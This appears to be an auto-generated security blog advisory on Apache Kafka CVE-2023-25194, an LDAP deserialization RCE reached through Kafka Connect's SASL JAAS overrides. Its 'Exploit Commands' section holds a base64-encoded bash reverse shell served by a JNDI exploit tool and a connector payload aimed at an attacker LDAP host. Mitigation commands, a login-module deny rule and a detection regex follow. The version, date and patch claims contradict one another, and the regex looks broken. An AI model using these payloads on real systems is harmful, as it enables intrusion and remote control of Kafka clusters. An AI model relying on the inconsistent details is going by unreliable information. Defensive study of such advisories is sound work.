Apache Kafka, LDAP Deserialization RCE, CVE-2023-25194 (Critical)

By /

Listen to this Post

How the CVE Works:

The vulnerability exploits Apache Kafka’s SASL JAAS configuration when an attacker with `ALTER_CONFIG` privileges manipulates `sasl.jaas.config` to use LdapLoginModule. By overriding connector client configurations (producer/consumer/admin.override.sasl.jaas.config), the attacker forces Kafka Connect to connect to a malicious LDAP server. The server deserializes untrusted LDAP responses, triggering Java deserialization gadget chains. This leads to remote code execution (RCE) if exploitable classes exist in the classpath. Versions before 3.9.1/4.0.0 are vulnerable unless explicitly restricted via client override policies.

DailyCVE Form:

Platform: Apache Kafka
Version: <3.9.1/4.0.0
Vulnerability: LDAP Deserialization → RCE
Severity: Critical
Date: 2023-01-01

Prediction: Patch expected Q1 2023

What Undercode Say:

Analytics:

  • Attack Vector: Network (SASL/JAAS abuse)
  • Exploitability: Low (requires `ALTER_CONFIG` + LDAP control)
  • Impact: Full cluster compromise via RCE.

Exploit Commands:

1. Malicious LDAP Server Setup:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTAwMCAwPiYx}|{base64,-d}|{bash,-i}" -A 127.0.0.1

2. Kafka Connector Payload:

{
"name": "evil-connector",
"config": {
"connector.class": "io.debezium.connector.mysql.MySqlConnector",
"database.hostname": "mysql",
"database.port": "3306",
"producer.override.sasl.jaas.config": "com.sun.security.auth.module.LdapLoginModule required user.provider.url=\"ldap://attacker.com:1389/Exploit\";"
}
}

Protection Commands:

1. Disable Vulnerable Modules:

export KAFKA_OPTS="-Dorg.apache.kafka.disallowed.login.modules=com.sun.security.auth.module.LdapLoginModule,com.sun.security.auth.module.JndiLoginModule"

2. Kafka Connect Policy Update:

connector.client.config.override.policy=PRINCIPAL

3. Version Upgrade:

wget https://archive.apache.org/dist/kafka/3.9.1/kafka_2.13-3.9.1.tgz && tar -xzf kafka_2.13-3.9.1.tgz

Code Snippets:

  • LDAP Payload Detection (Python): 
    import re
def detect_ldap_config(config):
return re.search(r"LdapLoginModule.user.provider.url", config, re.IGNORECASE)
  • Kafka ACL Lockdown: 
    bin/kafka-acls.sh --authorizer-properties zookeeper.connect=localhost:2181 --add --deny-principal User:Attacker --operation ALTER_CONFIGS --cluster

Mitigation Steps:

1. Audit all connector configurations for `sasl.jaas.config` overrides.

  1. Restrict Kafka Connect REST API to trusted IPs.

3. Monitor JNDI/LDAP outbound connections from Kafka servers.

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top